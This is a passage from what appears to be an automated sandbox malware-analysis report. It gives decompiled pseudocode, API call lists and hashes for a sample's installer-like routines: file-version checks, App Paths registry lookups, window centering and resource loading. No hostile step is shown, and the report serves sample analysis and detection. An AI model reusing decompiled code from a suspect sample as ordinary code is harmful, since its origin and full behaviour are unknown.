                                                                                                                                                                                                      								E00E765E8( &_v268);
                                                                                                                                                                                                      								_t55 =  &_v268;
                                                                                                                                                                                                      								_t62 = _t55 + 1;
                                                                                                                                                                                                      								do {
                                                                                                                                                                                                      									_t34 =  *_t55;
                                                                                                                                                                                                      									_t55 = _t55 + 1;
                                                                                                                                                                                                      								} while (_t34 != 0);
                                                                                                                                                                                                      								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                      								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                      									 *_t38 = 0;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								E00E71680(_t65, E00E717C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                      								_t59 = _t65;
                                                                                                                                                                                                      								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                      								_t60 = _t12;
                                                                                                                                                                                                      								do {
                                                                                                                                                                                                      									_t42 =  *_t59;
                                                                                                                                                                                                      									_t59 =  &(_t59[1]);
                                                                                                                                                                                                      								} while (_t42 != 0);
                                                                                                                                                                                                      								L17:
                                                                                                                                                                                                      								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t64 = CharNextA(_t64);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *_t65 = _t17;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00E76CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                      			}






















                                                                                                                                                                                                      0x00e72aac
                                                                                                                                                                                                      0x00e72ab7
                                                                                                                                                                                                      0x00e72abc
                                                                                                                                                                                                      0x00e72abe
                                                                                                                                                                                                      0x00e72ac3
                                                                                                                                                                                                      0x00e72ac6
                                                                                                                                                                                                      0x00e72ac9
                                                                                                                                                                                                      0x00e72ace
                                                                                                                                                                                                      0x00e72ae6
                                                                                                                                                                                                      0x00e72bdc
                                                                                                                                                                                                      0x00e72bdc
                                                                                                                                                                                                      0x00e72be0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e72af2
                                                                                                                                                                                                      0x00e72afc
                                                                                                                                                                                                      0x00e72b00
                                                                                                                                                                                                      0x00e72b05
                                                                                                                                                                                                      0x00e72b05
                                                                                                                                                                                                      0x00e72b0b
                                                                                                                                                                                                      0x00e72bca
                                                                                                                                                                                                      0x00e72bd1
                                                                                                                                                                                                      0x00e72b11
                                                                                                                                                                                                      0x00e72b18
                                                                                                                                                                                                      0x00e72b26
                                                                                                                                                                                                      0x00e72b99
                                                                                                                                                                                                      0x00e72bc8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e72b9b
                                                                                                                                                                                                      0x00e72bae
                                                                                                                                                                                                      0x00e72bb3
                                                                                                                                                                                                      0x00e72bb5
                                                                                                                                                                                                      0x00e72bb5
                                                                                                                                                                                                      0x00e72bb8
                                                                                                                                                                                                      0x00e72bb8
                                                                                                                                                                                                      0x00e72bba
                                                                                                                                                                                                      0x00e72bbb
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e72bb8
                                                                                                                                                                                                      0x00e72b28
                                                                                                                                                                                                      0x00e72b2e
                                                                                                                                                                                                      0x00e72b33
                                                                                                                                                                                                      0x00e72b39
                                                                                                                                                                                                      0x00e72b3c
                                                                                                                                                                                                      0x00e72b3c
                                                                                                                                                                                                      0x00e72b3e
                                                                                                                                                                                                      0x00e72b3f
                                                                                                                                                                                                      0x00e72b55
                                                                                                                                                                                                      0x00e72b5d
                                                                                                                                                                                                      0x00e72b64
                                                                                                                                                                                                      0x00e72b64
                                                                                                                                                                                                      0x00e72b7a
                                                                                                                                                                                                      0x00e72b7f
                                                                                                                                                                                                      0x00e72b81
                                                                                                                                                                                                      0x00e72b81
                                                                                                                                                                                                      0x00e72b84
                                                                                                                                                                                                      0x00e72b84
                                                                                                                                                                                                      0x00e72b86
                                                                                                                                                                                                      0x00e72b87
                                                                                                                                                                                                      0x00e72bbf
                                                                                                                                                                                                      0x00e72bc1
                                                                                                                                                                                                      0x00e72bc1
                                                                                                                                                                                                      0x00e72b26
                                                                                                                                                                                                      0x00e72bda
                                                                                                                                                                                                      0x00e72bda
                                                                                                                                                                                                      0x00e72be6
                                                                                                                                                                                                      0x00e72be6
                                                                                                                                                                                                      0x00e72bf8

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00E72AE6
                                                                                                                                                                                                      • IsDBCSLeadByte.KERNEL32(00000000), ref: 00E72AF2
                                                                                                                                                                                                      • CharNextA.USER32(?), ref: 00E72B12
                                                                                                                                                                                                      • CharUpperA.USER32 ref: 00E72B1E
                                                                                                                                                                                                      • CharPrevA.USER32(?,?), ref: 00E72B55
                                                                                                                                                                                                      • CharNextA.USER32(?), ref: 00E72BD4
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 571164536-0
                                                                                                                                                                                                      • Opcode ID: e31eb103858e26884bfca8b2bd9da61df0753115bfbd30903e919313a0792ce0
                                                                                                                                                                                                      • Instruction ID: 1a07ffb1b10bd9cf9b87ed3c406d278cf0371571ca9d10f7ba27111f72c7f131
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e31eb103858e26884bfca8b2bd9da61df0753115bfbd30903e919313a0792ce0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC4127345082855FDB159F34DC54AFD7BA99F92304F0890EED8CAB7202DB354E8ACB50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00E728E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				char* _v12;
                                                                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                                                                      				void* _v20;
                                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                                      				int _v28;
                                                                                                                                                                                                      				char _v32;
                                                                                                                                                                                                      				void* _v36;
                                                                                                                                                                                                      				int _v40;
                                                                                                                                                                                                      				void* _v44;
                                                                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                                                                      				intOrPtr _v52;
                                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                                      				intOrPtr _v60;
                                                                                                                                                                                                      				intOrPtr _v64;
                                                                                                                                                                                                      				long _t68;
                                                                                                                                                                                                      				void* _t70;
                                                                                                                                                                                                      				void* _t73;
                                                                                                                                                                                                      				void* _t79;
                                                                                                                                                                                                      				void* _t83;
                                                                                                                                                                                                      				void* _t87;
                                                                                                                                                                                                      				void* _t88;
                                                                                                                                                                                                      				intOrPtr _t93;
                                                                                                                                                                                                      				intOrPtr _t97;
                                                                                                                                                                                                      				intOrPtr _t99;
                                                                                                                                                                                                      				int _t101;
                                                                                                                                                                                                      				void* _t103;
                                                                                                                                                                                                      				void* _t106;
                                                                                                                                                                                                      				void* _t109;
                                                                                                                                                                                                      				void* _t110;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_v12 = __edx;
                                                                                                                                                                                                      				_t99 = __ecx;
                                                                                                                                                                                                      				_t106 = 0;
                                                                                                                                                                                                      				_v16 = __ecx;
                                                                                                                                                                                                      				_t87 = 0;
                                                                                                                                                                                                      				_t103 = 0;
                                                                                                                                                                                                      				_v20 = 0;
                                                                                                                                                                                                      				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                      					L19:
                                                                                                                                                                                                      					_t106 = 1;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t62 = 0;
                                                                                                                                                                                                      					_v8 = 0;
                                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                                      						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                      						if(E00E72773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                      							goto L20;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t11 =  &_v32; // 0xe73938
                                                                                                                                                                                                      						_t68 = GetFileVersionInfoSizeA(_v12, _t11);
                                                                                                                                                                                                      						_v28 = _t68;
                                                                                                                                                                                                      						if(_t68 == 0) {
                                                                                                                                                                                                      							_t99 = _v16;
                                                                                                                                                                                                      							_t70 = _v8 + _t99;
                                                                                                                                                                                                      							_t93 = _v24;
                                                                                                                                                                                                      							_t87 = _v20;
                                                                                                                                                                                                      							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                      								goto L18;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                      							if(_t103 != 0) {
                                                                                                                                                                                                      								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                      								_v36 = _t73;
                                                                                                                                                                                                      								if(_t73 != 0) {
                                                                                                                                                                                                      									_t16 =  &_v32; // 0xe73938
                                                                                                                                                                                                      									if(GetFileVersionInfoA(_v12,  *_t16, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                      										L15:
                                                                                                                                                                                                      										GlobalUnlock(_t103);
                                                                                                                                                                                                      										_t99 = _v16;
                                                                                                                                                                                                      										L18:
                                                                                                                                                                                                      										_t87 = _t87 + 1;
                                                                                                                                                                                                      										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                      										_v20 = _t87;
                                                                                                                                                                                                      										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                      										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                      											continue;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											goto L19;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t79 = _v44;
                                                                                                                                                                                                      										_t88 = _t106;
                                                                                                                                                                                                      										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                      										_t101 = _v28;
                                                                                                                                                                                                      										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                      										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                      										_t97 = _v48;
                                                                                                                                                                                                      										_v36 = _t83;
                                                                                                                                                                                                      										_t109 = _t83;
                                                                                                                                                                                                      										do {
                                                                                                                                                                                                      											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00E72A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                      											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00E72A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                      											_t109 = _t109 + 0x18;
                                                                                                                                                                                                      											_t88 = _t88 + 4;
                                                                                                                                                                                                      										} while (_t88 < 8);
                                                                                                                                                                                                      										_t87 = _v20;
                                                                                                                                                                                                      										_t106 = 0;
                                                                                                                                                                                                      										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                      											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                      												GlobalUnlock(_t103);
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												goto L15;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											goto L15;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L20;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				L20:
                                                                                                                                                                                                      				 *_a8 = _t87;
                                                                                                                                                                                                      				if(_t103 != 0) {
                                                                                                                                                                                                      					GlobalFree(_t103);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t106;
                                                                                                                                                                                                      			}

































                                                                                                                                                                                                      0x00e728f1
                                                                                                                                                                                                      0x00e728f4
                                                                                                                                                                                                      0x00e728f7
                                                                                                                                                                                                      0x00e728f9
                                                                                                                                                                                                      0x00e728fc
                                                                                                                                                                                                      0x00e728ff
                                                                                                                                                                                                      0x00e72901
                                                                                                                                                                                                      0x00e72907
                                                                                                                                                                                                      0x00e72a62
                                                                                                                                                                                                      0x00e72a64
                                                                                                                                                                                                      0x00e7290d
                                                                                                                                                                                                      0x00e7290d
                                                                                                                                                                                                      0x00e7290f
                                                                                                                                                                                                      0x00e72912
                                                                                                                                                                                                      0x00e72920
                                                                                                                                                                                                      0x00e72937
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7293d
                                                                                                                                                                                                      0x00e72944
                                                                                                                                                                                                      0x00e7294a
                                                                                                                                                                                                      0x00e7294f
                                                                                                                                                                                                      0x00e72a2f
                                                                                                                                                                                                      0x00e72a32
                                                                                                                                                                                                      0x00e72a34
                                                                                                                                                                                                      0x00e72a37
                                                                                                                                                                                                      0x00e72a41
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e72955
                                                                                                                                                                                                      0x00e7295e
                                                                                                                                                                                                      0x00e72962
                                                                                                                                                                                                      0x00e72969
                                                                                                                                                                                                      0x00e7296f
                                                                                                                                                                                                      0x00e72974
                                                                                                                                                                                                      0x00e7297e
                                                                                                                                                                                                      0x00e7298c
                                                                                                                                                                                                      0x00e72a20
                                                                                                                                                                                                      0x00e72a21
                                                                                                                                                                                                      0x00e72a27
                                                                                                                                                                                                      0x00e72a4c
                                                                                                                                                                                                      0x00e72a4f
                                                                                                                                                                                                      0x00e72a50
                                                                                                                                                                                                      0x00e72a53
                                                                                                                                                                                                      0x00e72a56
                                                                                                                                                                                                      0x00e72a5c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e729b2
                                                                                                                                                                                                      0x00e729b2
                                                                                                                                                                                                      0x00e729b5
                                                                                                                                                                                                      0x00e729bd
                                                                                                                                                                                                      0x00e729c3
                                                                                                                                                                                                      0x00e729cc
                                                                                                                                                                                                      0x00e729d5
                                                                                                                                                                                                      0x00e729d7
                                                                                                                                                                                                      0x00e729da
                                                                                                                                                                                                      0x00e729dd
                                                                                                                                                                                                      0x00e729df
                                                                                                                                                                                                      0x00e729ec
                                                                                                                                                                                                      0x00e729f8
                                                                                                                                                                                                      0x00e729fc
                                                                                                                                                                                                      0x00e729ff
                                                                                                                                                                                                      0x00e72a02
                                                                                                                                                                                                      0x00e72a07
                                                                                                                                                                                                      0x00e72a0a
                                                                                                                                                                                                      0x00e72a0f
                                                                                                                                                                                                      0x00e72a19
                                                                                                                                                                                                      0x00e72a81
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e72a0f
                                                                                                                                                                                                      0x00e7298c
                                                                                                                                                                                                      0x00e72974
                                                                                                                                                                                                      0x00e72962
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7294f
                                                                                                                                                                                                      0x00e72912
                                                                                                                                                                                                      0x00e72a65
                                                                                                                                                                                                      0x00e72a68
                                                                                                                                                                                                      0x00e72a6c
                                                                                                                                                                                                      0x00e72a6f
                                                                                                                                                                                                      0x00e72a6f
                                                                                                                                                                                                      0x00e72a7d

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GlobalFree.KERNEL32 ref: 00E72A6F
                                                                                                                                                                                                        • Part of subcall function 00E72773: CharUpperA.USER32(D47724E2,00000000,00000000,00000000), ref: 00E727A8
                                                                                                                                                                                                        • Part of subcall function 00E72773: CharNextA.USER32(0000054D), ref: 00E727B5
                                                                                                                                                                                                        • Part of subcall function 00E72773: CharNextA.USER32(00000000), ref: 00E727BC
                                                                                                                                                                                                        • Part of subcall function 00E72773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E72829
                                                                                                                                                                                                        • Part of subcall function 00E72773: RegQueryValueExA.ADVAPI32(?,00E71140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E72852
                                                                                                                                                                                                        • Part of subcall function 00E72773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E72870
                                                                                                                                                                                                        • Part of subcall function 00E72773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E728A0
                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00E73938,?,?,?,?,-00000005), ref: 00E72958
                                                                                                                                                                                                      • GlobalLock.KERNEL32 ref: 00E72969
                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00E73938,?,?,?,?,-00000005,?), ref: 00E72A21
                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00E73938,?,?), ref: 00E72A81
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                      • String ID: 89
                                                                                                                                                                                                      • API String ID: 3949799724-2925746602
                                                                                                                                                                                                      • Opcode ID: 53fe3f83fbea1a4f760242bd1fa40a9f81f899ce17b04433543589f29429c1a9
                                                                                                                                                                                                      • Instruction ID: 03ff501c3baa196401992ff02c7aa35f9bab65debb264efc5e15f3fa586fe17f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 53fe3f83fbea1a4f760242bd1fa40a9f81f899ce17b04433543589f29429c1a9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C5511931900219DFCB21CF99D884AAEBBB5FF88704F14906EEA19F3261DB319941DB90
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                                                                      			E00E743D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				struct tagRECT _v24;
                                                                                                                                                                                                      				struct tagRECT _v40;
                                                                                                                                                                                                      				struct HWND__* _v44;
                                                                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                                                                      				int _v52;
                                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                                      				int _v60;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t29;
                                                                                                                                                                                                      				void* _t53;
                                                                                                                                                                                                      				intOrPtr _t56;
                                                                                                                                                                                                      				int _t59;
                                                                                                                                                                                                      				struct HWND__* _t63;
                                                                                                                                                                                                      				struct HWND__* _t67;
                                                                                                                                                                                                      				struct HWND__* _t68;
                                                                                                                                                                                                      				struct HDC__* _t69;
                                                                                                                                                                                                      				int _t72;
                                                                                                                                                                                                      				signed int _t74;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t63 = __edx;
                                                                                                                                                                                                      				_t29 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                      				_t68 = __edx;
                                                                                                                                                                                                      				_v44 = __ecx;
                                                                                                                                                                                                      				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                      				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                      				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                      				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                      				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                      				_t69 = GetDC(_v44);
                                                                                                                                                                                                      				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                      				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                      				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                      				_t56 = _v48;
                                                                                                                                                                                                      				asm("cdq");
                                                                                                                                                                                                      				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                      				_t67 = 0;
                                                                                                                                                                                                      				if(_t72 >= 0) {
                                                                                                                                                                                                      					_t63 = _v52;
                                                                                                                                                                                                      					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                      						_t72 = _t63 - _t56;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t72 = _t67;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				asm("cdq");
                                                                                                                                                                                                      				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                      				if(_t59 >= 0) {
                                                                                                                                                                                                      					_t63 = _v60;
                                                                                                                                                                                                      					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                      						_t59 = _t63 - _t53;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t59 = _t67;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00E76CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                      			}
























                                                                                                                                                                                                      0x00e743d0
                                                                                                                                                                                                      0x00e743d8
                                                                                                                                                                                                      0x00e743df
                                                                                                                                                                                                      0x00e743e6
                                                                                                                                                                                                      0x00e743ec
                                                                                                                                                                                                      0x00e743f1
                                                                                                                                                                                                      0x00e74400
                                                                                                                                                                                                      0x00e74403
                                                                                                                                                                                                      0x00e7440b
                                                                                                                                                                                                      0x00e74420
                                                                                                                                                                                                      0x00e74429
                                                                                                                                                                                                      0x00e74437
                                                                                                                                                                                                      0x00e74444
                                                                                                                                                                                                      0x00e74447
                                                                                                                                                                                                      0x00e7444d
                                                                                                                                                                                                      0x00e74454
                                                                                                                                                                                                      0x00e7445b
                                                                                                                                                                                                      0x00e74460
                                                                                                                                                                                                      0x00e74461
                                                                                                                                                                                                      0x00e74467
                                                                                                                                                                                                      0x00e7446f
                                                                                                                                                                                                      0x00e74473
                                                                                                                                                                                                      0x00e74473
                                                                                                                                                                                                      0x00e74463
                                                                                                                                                                                                      0x00e74463
                                                                                                                                                                                                      0x00e74463
                                                                                                                                                                                                      0x00e7447a
                                                                                                                                                                                                      0x00e74481
                                                                                                                                                                                                      0x00e74484
                                                                                                                                                                                                      0x00e7448a
                                                                                                                                                                                                      0x00e74492
                                                                                                                                                                                                      0x00e74496
                                                                                                                                                                                                      0x00e74496
                                                                                                                                                                                                      0x00e74486
                                                                                                                                                                                                      0x00e74486
                                                                                                                                                                                                      0x00e74486
                                                                                                                                                                                                      0x00e744b8

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00E743F1
                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00E7440B
                                                                                                                                                                                                      • GetDC.USER32(?), ref: 00E74423
                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 00E7442E
                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00E7443A
                                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00E74447
                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 00E744A2
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2212493051-0
                                                                                                                                                                                                      • Opcode ID: 6bc8186aa2a03a81439c2813f56244863011835de2a9c631bde32f62d209ff9d
                                                                                                                                                                                                      • Instruction ID: 6cbfa8e8433e31b3cb1d0605016fe2dac886dc297cc7335cb3ca1e8e5f940800
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6bc8186aa2a03a81439c2813f56244863011835de2a9c631bde32f62d209ff9d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 87314F72E00119AFDB14CFB9DD489EEBBB5EB89310F554169F809B3240EA306D459B60
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 53%
                                                                                                                                                                                                      			E00E76298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v28;
                                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                                      				struct HINSTANCE__* _v36;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t16;
                                                                                                                                                                                                      				struct HRSRC__* _t21;
                                                                                                                                                                                                      				intOrPtr _t26;
                                                                                                                                                                                                      				void* _t30;
                                                                                                                                                                                                      				struct HINSTANCE__* _t36;
                                                                                                                                                                                                      				intOrPtr* _t40;
                                                                                                                                                                                                      				void* _t41;
                                                                                                                                                                                                      				intOrPtr* _t44;
                                                                                                                                                                                                      				intOrPtr* _t45;
                                                                                                                                                                                                      				void* _t47;
                                                                                                                                                                                                      				signed int _t50;
                                                                                                                                                                                                      				struct HINSTANCE__* _t51;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t44 = __edx;
                                                                                                                                                                                                      				_t16 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                      				_t46 = 0;
                                                                                                                                                                                                      				_v32 = __ecx;
                                                                                                                                                                                                      				_v36 = 0;
                                                                                                                                                                                                      				_t36 = 1;
                                                                                                                                                                                                      				E00E7171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					_t51 = _t51 + 0x10;
                                                                                                                                                                                                      					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                      					if(_t21 == 0) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                      					if(_t45 == 0) {
